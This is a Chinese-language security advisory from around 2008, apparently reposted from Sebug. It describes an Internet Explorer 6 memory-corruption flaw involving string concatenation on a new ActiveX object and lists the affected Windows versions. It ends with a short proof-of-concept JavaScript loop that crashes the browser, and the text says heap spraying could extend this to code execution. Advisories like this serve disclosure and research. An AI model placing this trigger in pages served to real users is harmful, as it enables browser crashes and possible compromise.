BUGTRAQ ID: 30219
CNCAN ID:CNCAN-2008071510
Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer new ActiveX对象处理存在内存破坏,远程攻击者可以利用漏洞对程序进行拒绝服务攻击,可能导致任意代码执行。
构建使用New ActiveX对象字符串的串联,当Internet Explorer解析时可导致应用程序崩溃,通过使用Javascript aka heapspray填充内存的方法可控制堆,导致以应用程序权限执行任意指令。
Microsoft Internet Explorer New ActiveX对象字符串串联内存破坏漏洞
Published:2008-07-14
Vulnerable:
Microsoft Internet Explorer 6.0 SP2
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
Discription:
SEBUG Solution:
目前没有解决方案提供:
http://www.microsoft.com/ie/
http://www.microsoft.com/ie/
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
<script>
for(i=0;i<33;i++){
try{
foo = new ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3');
}catch(e){}
}
</script>
------------------------------------------------------------// Sebug.net [ 2008-07-15 ]